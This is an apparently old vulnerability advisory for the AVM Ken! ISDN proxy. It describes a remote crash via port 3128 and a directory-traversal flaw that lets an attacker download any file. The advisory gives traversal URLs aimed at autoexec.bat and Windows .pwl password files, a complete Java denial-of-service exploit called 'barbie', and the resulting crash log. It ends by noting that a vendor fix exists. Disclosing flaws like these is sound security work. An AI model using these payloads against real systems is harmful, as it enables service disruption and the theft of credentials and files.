COMMAND

    Ken!

SYSTEMS AFFECTED

    Ken! ISDN Proxy Software.

PROBLEM

    "eAX  [Teelicht]"   found  following.    He   found  two   serious
    (security) bugs  in your  internet/isdn proxy  software AVM  Ken!.
    While testing some  things on a  friends system, which  is running
    Ken!, he noticed that you can  crash Ken! remotly and force it  to
    cut off  all connections,  using a  simple Telnet  connection.  He
    also found a way to downlaod ANY file from the Ken! Server.   When
    we say ANY file we mean ANY file!

    The Denial of Service attack (crash):
    =====================================
    eAX scanned the system for  open ports and noticed that  port 3128
    was opened by Ken!.   He connected to it  via a telnet client  and
    sended some  trash (until  now just  intrested in  the HTTP  error
    message), but then he noticed  that Ken! crashs with a  pagefault,
    closes all  connections and  restarts.   This was  retested with a
    Windows  98  and  a  Windows  2000  machine,  both Ken!'s crashed.
    (Tested with Ken! 1.03.10 (german)).

    The download everything bug (dangerous!!):
    ==========================================
    While looking for  more bugs, eAX  found out this.   Type in  your
    webbrowser:

        http://targethost:3128/../../../../../autoexec.bat

    or

        http://localhost:3128/../../../../../windows/any_pwl_you_want.pwl

    If   Ken!    is    located   in    the    C:/Programme/Ken!/    or
    C:/Program  Files/Ken!,  this  will  cause  ken  to  send  you the
    autoexec.bat, or any file you want (just change the url).

    Below is a EXPLOIT CODE written  in Java, what can be used  on any
    OS.

    import java.net.Socket;
    import java.io.*;

    /*
    BARBIE - The AVM KEN! exploit

    This exploit causes a crash in the AVM KEN! ISDN Proxy software.
    All conections will be cut off, but the server will restart again,
    a few seconds later.

    Tested with AVM KEN! Version 1.03.10 (german)
    */

    class barbie {

    String adress;

    public void killken() {
    PrintWriter out = null;
    try{
        Socket connection = new Socket( adress, 3128);
        System.out.println("");
        System.out.println("killing...");
        out  = new PrintWriter(connection.getOutputStream(), true);
        out.println("Whooopppss_Ken_died");
        connection.close();
       }
    catch (IOException e)
    {
    System.out.println("");
    System.out.println(" Can't met Ken! ");
    }
    }


    public static void main (String arguments[]) {
    barbie kk = new barbie();
    if(arguments.length < 1)
    {
    System.out.println("");
    System.out.println("usage: java barbie <adress/ip>");
    System.exit(1);
    }
    kk.adress = arguments[0];
    kk.killken();
    }

    }

    Log file:

        2000-04-12 20:36:40 keninet: CheckLimits charge(0,50000) time(0,180000) -->0 ACTIVE=TRUE): t1=0 t2=955564600
        2000-04-12 20:40:14 kenserv: Process #6c is DOWN, Code=-1073741819
        2000-04-12 20:40:14 kenserv: Process KENPROXY.EXE TERMINATED witout UNREGISTER_MSG (CRASH), Restarting immed
        2000-04-12 20:40:14 kenserv: ----- Task PROXY(4) STOPPED, restart:1 immed.-----
        2000-04-12 20:40:14 kenserv: DUMP: bShutdown=0
        2000-04-12 20:40:14 kenserv:  TASK CAPI state=0 hProc=0x0 tRest=0 bDelayedSt=0 nStopRetry=0 bStopFailed=0
        2000-04-12 20:40:14 kenserv:  TASK INET state=2 hProc=0x78 tRest=0 bDelayedSt=0 nStopRetry=0 bStopFailed=0
        2000-04-12 20:40:14 kenserv:  TASK PROXY state=0 hProc=0x0 tRest=1 bDelayedSt=0 nStopRetry=0 bStopFailed=0
        2000-04-12 20:40:14 kenserv:  TASK MAIL state=0 hProc=0x0 tRest=0 bDelayedSt=0 nStopRetry=0 bStopFailed=0
        2000-04-12 20:40:14 kenserv:  TASK DHCP state=0 hProc=0x0 tRest=0 bDelayedSt=0 nStopRetry=0 bStopFailed=0
        2000-04-12 20:40:14 kenserv:  TASK DNS state=0 hProc=0x0 tRest=0 bDelayedSt=0 nStopRetry=0 bStopFailed=0
        2000-04-12 20:40:14 kenserv:  TASK SOCKS state=2 hProc=0x5c tRest=0 bDelayedSt=0 nStopRetry=0 bStopFailed=0
        2000-04-12 20:40:14 kenserv:  TASK MAP state=2 hProc=0x74 tRest=0 bDelayedSt=0 nStopRetry=0 bStopFailed=0
        2000-04-12 20:40:14 kenserv: Executing (KENPROXY.EXE) - OK

    This hole still exists in the 1.04.30 version.

SOLUTION

    The described security hole is only exploitable in local networks.
    The Ken! Server secures  itself against attacks from  the internet
    with  a  NAT  shield.   Ken!  wasn't  designed for enterprises but
    for small networks, were Ken!  designers can expect the people  to
    trust each other.  The  described errors were fixed in  the latest
    Version of Ken! 1.04.32 which is now officely free for download at
    the ADC.